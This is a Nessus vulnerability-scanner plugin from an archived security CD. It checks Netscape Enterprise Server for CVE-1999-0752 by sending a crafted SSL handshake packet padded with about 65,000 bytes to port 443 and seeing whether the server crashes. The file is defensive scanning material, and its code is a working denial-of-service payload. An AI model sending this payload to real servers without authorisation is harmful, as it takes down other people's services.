home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / netscape_crash.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  98 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10155);
  10.  script_bugtraq_id(516);
  11.  script_version ("$Revision: 1.22 $");
  12.  script_cve_id("CVE-1999-0752");
  13.  name["english"] = "Netscape Enterprise Server DoS";
  14.  name["francais"] = "DΘni de service contre Netscape Entrerprise Server";
  15.  
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. There is a SSL handshake bug in the remote
  20. secure web server which could lead into a 
  21. denial of  service.
  22.  
  23. An attacker may use this flaw to prevent your
  24. site from working properly.
  25.  
  26. Solution : if you are using Netscape Enterprise
  27. Server, there is a patch available at :
  28. http://help.netscape.com/business/filelib.html#SSLHandshake
  29. Or else, report this vulnerability to your vendor.
  30.  
  31.  
  32. BugTraq id : 516
  33. Risk factor : High";
  34.  
  35.  
  36.  desc["francais"] = "
  37. Il y a un bug dans le handshake SSL du serveur
  38. web sΘcurisΘ distant qui a menΘ α un dΘni
  39. de service.
  40.  
  41. Des pirates peuvent utiliser ce problΦme pour
  42. empecher votre site de fonctionner normallement.
  43.  
  44. Solution : si vous utilisez Netscape Enterprise
  45. Server, il y a un patch disponible α :
  46. http://help.netscape.com/business/filelib.html#SSLHandshake
  47. Sinon, rapportez cette vulnΘrabilitΘ α votre vendeur.
  48.  
  49.  
  50. ID BugTraq : 516
  51. Facteur de risque : SΘrieux";
  52.  
  53.  script_description(english:desc["english"], francais:desc["francais"]);
  54.  
  55.  summary["english"] = "Crashes the remote SSL server";
  56.  summary["francais"] = "Plante le serveur SSL distant";
  57.  script_summary(english:summary["english"], francais:summary["francais"]);
  58.  
  59.  script_category(ACT_DENIAL);
  60.  
  61.  
  62.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  63.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  64.  family["english"] = "Denial of Service";
  65.  family["francais"] = "DΘni de service";
  66.  script_family(english:family["english"], francais:family["francais"]);
  67.  script_dependencie("find_service.nes", "http_version.nasl");
  68.  script_require_keys("www/iplanet");
  69.  script_require_ports(443);
  70.  exit(0);
  71. }
  72.  
  73. #
  74. # The script code starts here
  75. #
  76.  
  77. port = 443;
  78. if(get_port_state(port))
  79. {
  80.  soc = open_sock_tcp(port, transport:ENCAPS_IP);
  81.  if(soc)
  82.  {
  83.  s = raw_string(46, 46, 8, 
  84.  0x01, 0x03, 0x00, 0x00, 0x0c,
  85.  0x00, 0x00, 0x00, 0x10, 0x02,
  86.  0x00, 0x80, 0x04, 0x00, 0x80,
  87.  0x00, 0x00, 0x03, 0x00, 0x00,
  88.  0x06) + crap(length:65516, data:".");
  89.  send(socket:soc, data:s);
  90.  close(soc);
  91.  sleep(5);
  92.  soc = open_sock_tcp(port);
  93.  if(!soc)security_hole(port);
  94.  else close(soc);
  95.  }
  96. }
  97.  
  98.